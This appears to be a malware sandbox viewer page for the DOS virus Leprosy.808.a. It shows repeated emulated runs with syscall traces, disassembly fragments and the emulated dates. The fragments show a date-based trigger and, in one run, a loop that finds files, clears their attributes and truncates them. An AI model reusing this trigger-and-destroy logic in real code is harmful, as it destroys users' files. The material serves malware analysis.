Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:24.1071175Z 48 PC: 12b36 | Get DOS version
2018-12-17T22:26:24.108874984Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-17T22:26:24.121495393Z 26 PC: 12b49 | Set disk transfer address
2018-12-17T22:26:24.122990885Z 25 PC: 12b4d | Get default drive
2018-12-17T22:26:24.124518545Z 71 PC: 12b58 | Get current directory
2018-12-17T22:26:24.128611025Z 59 PC: 12b5f | Change current directory
2018-12-17T22:26:24.132902992Z 78 PC: 12b69 | Find first file
2018-12-17T22:26:24.13891685Z 87 PC: 12c4d | Get or set file date and time
2018-12-17T22:26:24.142319694Z 67 PC: 12c59 | Get or set file attributes
2018-12-17T22:26:24.148646387Z 59 PC: 12c60 | Change current directory
2018-12-17T22:26:24.152603238Z 59 PC: 12c67 | Change current directory
2018-12-17T22:26:24.155563632Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-17T22:26:24.157714485Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.095250233Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.097281638Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.100457426Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.101942042Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.104273218Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.113204397Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.118825628Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.129599157Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.13270663Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.139732809Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.15074088Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.154096906Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.158007311Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.179884874Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.181719411Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.184541141Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.185810768Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.18877602Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.192795568Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.197367637Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.203830878Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.205849911Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.213169801Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.218135603Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.222050425Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.224917737Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.283619036Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.285081647Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.287031179Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.287921068Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.289283567Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.29205825Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.295850483Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.306957847Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.308586792Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.313985261Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.318204534Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.319739374Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.321642794Z 26 PC: 12c81 | Set disk transfer address
2018-12-25T11:52:40.323103137Z 78 PC: 12c8b | Find first file
2018-12-25T11:52:40.328591618Z 67 PC: 12c94 | Get or set file attributes
2018-12-25T11:52:40.332890284Z 60 PC: 12c9b | Create or truncate file
2018-12-25T11:52:40.365565549Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.367310124Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.379785354Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.394134714Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.396754675Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.406198875Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.417907366Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.429156724Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.438618779Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.45012421Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.453988759Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.464034299Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.475794479Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.47903884Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.488759063Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.500762604Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.50393677Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.513527733Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.541849707Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.544906622Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.554584109Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.566575947Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.57086474Z 67 PC: 12c94 | Get or set file attributes (See above)
2018-12-25T11:52:40.58948295Z 60 PC: 12c9b | Create or truncate file (See above)
2018-12-25T11:52:40.6015579Z 79 PC: 12c8b | Find next file (See above)
2018-12-25T11:52:40.604360463Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4679,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:40.396219397Z 48 PC: 12b36 | Get DOS version
2018-12-25T11:52:40.398252199Z 44 PC: 12b3e | Get time 0x12b3e: mov byte ptr [0x103], dl
0x12b42: mov dx, 0x146
0x12b45: mov ah, 0x1a
0x12b47: int 0x21
0x12b49: mov ah, 0x19
0x12b4b: int 0x21
0x12b4d: mov dl, al
0x12b4f: inc dl
0x12b51: mov ah, 0x47
0x12b53: mov si, 0x1a5
0x12b56: int 0x21
0x12b58: mov dx, 0x144
0x12b5b: mov ah, 0x3b
0x12b5d: int 0x21
0x12b5f: mov cx, 0x13
0x12b62: mov dx, 0x138
0x12b65: mov ah, 0x4e
0x12b67: int 0x21
0x12b69: cmp ax, 0x12
0x12b6c: jne 0x12b71
2018-12-25T11:52:40.400617924Z 26 PC: 12b49 | Set disk transfer address
2018-12-25T11:52:40.401562263Z 25 PC: 12b4d | Get default drive
2018-12-25T11:52:40.403088184Z 71 PC: 12b58 | Get current directory
2018-12-25T11:52:40.405832738Z 59 PC: 12b5f | Change current directory
2018-12-25T11:52:40.409584253Z 78 PC: 12b69 | Find first file
2018-12-25T11:52:40.4154806Z 87 PC: 12c4d | Get or set file date and time
2018-12-25T11:52:40.41718085Z 67 PC: 12c59 | Get or set file attributes
2018-12-25T11:52:40.422734219Z 59 PC: 12c60 | Change current directory
2018-12-25T11:52:40.431427423Z 59 PC: 12c67 | Change current directory
2018-12-25T11:52:40.433449406Z 42 PC: 12c6b | Get date 0x12c6b: cmp cx, 0x7c7
0x12c6f: jb 0x12ca1
0x12c71: cmp dl, 0x19
0x12c74: jb 0x12ca1
0x12c76: cmp al, 5
0x12c78: jne 0x12ca1
0x12c7a: mov dx, 0x146
0x12c7d: mov ah, 0x1a
0x12c7f: int 0x21
0x12c81: mov ah, 0x4e
0x12c83: mov cx, 7
0x12c86: mov dx, 0x140
0x12c89: int 0x21
0x12c8b: jb 0x12ca1
0x12c8d: mov ax, 0x4301
0x12c90: xor cx, cx
0x12c92: int 0x21
0x12c94: mov dx, 0x164
0x12c97: mov ah, 0x3c
0x12c99: int 0x21
2018-12-25T11:52:40.435601461Z 76 PC: 12ca6 | Terminate with return code (Return code = '0')